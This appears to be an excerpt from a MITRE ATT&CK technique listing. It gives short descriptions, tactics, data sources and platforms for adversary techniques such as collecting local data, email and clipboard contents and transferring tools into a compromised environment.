Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre